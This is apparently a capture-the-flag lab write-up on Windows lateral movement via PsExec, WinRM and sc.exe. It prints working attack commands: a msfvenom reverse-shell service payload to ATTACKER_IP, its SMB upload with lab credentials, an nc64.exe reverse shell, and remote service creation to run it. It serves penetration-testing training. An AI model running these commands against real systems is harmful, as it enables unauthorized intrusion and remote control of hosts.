Spawning Processes Remotely

Here are some of the methods that attackers use to remotely spawn processes:

Psexec

Ports: 445/TCP (SMB)
Required Group Memberships: Administrators

Authentication

Attacker provides credentials to authenticate remote system

SMB Connection

Psexec connects over SMB (TCP port 445)

Service Creation

Psexec creates and executes PSEXESVC.exe spawning a new service named PSEXESVC

Command Execution

The new service runs with SYSTEM privileges and outputs to the attacker's machine

The stdout, stdin and stderr are also managed by the created Named Pipes. A named pipe is a special file that allows for Inter-Process Communication (IPC) meaning two processes can send and receive data between each other.

The command below spawns a remote cmd:

psexec \\TARGET_IP -u Administrator -p Password cmd.exe

WinRM

Ports: 5985/TCP (WinRM HTTP) or 5986/TCP (WinRM HTTPS)
Required Group Memberships: Remote Management Users

Windows Remote Management (WinRM) is a web-based protocol used to send Powershell commands to Windows hosts remotely. Most Windows Server installations will have WinRM enabled by default, making it an attractive attack vector.

Using Powershell:

Invoke-Command -ComputerName TARGET -Credential Administrator -ScriptBlock { ipconfig }

Using Evil-WinRM:

evil-winrm -i TARGET -u Administrator -p password

Sc

Ports:
- 135/TCP, 49152-65535/TCP (DCE/RPC)
- 445/TCP (RPC over SMB Named Pipes)
- 139/TCP (RPC over SMB Named Pipes)
Required Group Memberships: Administrators

sc is a command that allows you to create, modify, start and stop Windows services and that includes remotely!

When sc.exe is used to manage services on a remote machine, it communicates with the Service Control Manager (SVCCTL) through RPC (Remote Procedure Call) in 2 ways:

The client connects to Endpoint Mapper (EPM) and requests the SVCCTL service
EPM responds with the IP and dynamic port (49152-65535) where SVCCTL is listening
Client then connects to SVCCTL on that dynamic port

The command below creates a service that opens Calculator:

sc \\TARGET create EvilService binPath= "cmd.exe /c calc.exe" start= auto

Task 1

We start at THMJMP2. The goal here is we need to move laterally to THMIIS using sc.exe by getting a reverse shell from a spawned process and get the flag. Initial credentials are given (assume we captured with admin access)

User: ZA.TRYHACKME.COM\t1_leonard.summers

Password: EZpass4ever

First, Generate the payload using msfvenom

msfvenom -p windows/shell/reverse_tcp -f exe-service LHOST=<ATTACKER_IP> LPORT=<ATTACKER_PORT> -o service.exe

-f exe-service > Makes the payload behave like a Windows service

Proceed to use the current user's credentials to upload the payload to the ADMIN$ share of THMIIS using smbclient

smbclient -c 'put service.exe' -U t1_leonard.summers -W ZA '//thmiis.za.tryhackme.com/admin$/' EZpass4ever

-c 'put mother.exe' > Command to upload payload to share

-W ZA > Windows domain

Setup the listener to receive the reverse shell

msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST lateralmovement
msf6 exploit(multi/handler) > set LPORT <ATTACKER_PORT>
msf6 exploit(multi/handler) > set payload windows/shell/reverse_tcp
msf6 exploit(multi/handler) > exploit 

[*] Started reverse TCP handler on <ATTACKER_IP>:<ATTACKER_PORT>

Now, we SSH into the initial setup where the credentials were given when setting up DNS.

Start a listener on another port

Now we runas to spawn a second shell from the user above using t1_leonard.summers access token

C:\> runas /netonly /user:ZA.TRYHACKME.COM\t1_leonard.summers "c:\tools\nc64.exe -e cmd.exe ATTACKER_IP 1235"

We received a callback from the listener

Now create a service name with our payload and start it

C:\> sc.exe \\thmiis.za.tryhackme.com create <Service_Name> binPath= "%windir%\service.exe" start= auto
C:\> sc.exe \\thmiis.za.tryhackme.com start <Service_Name>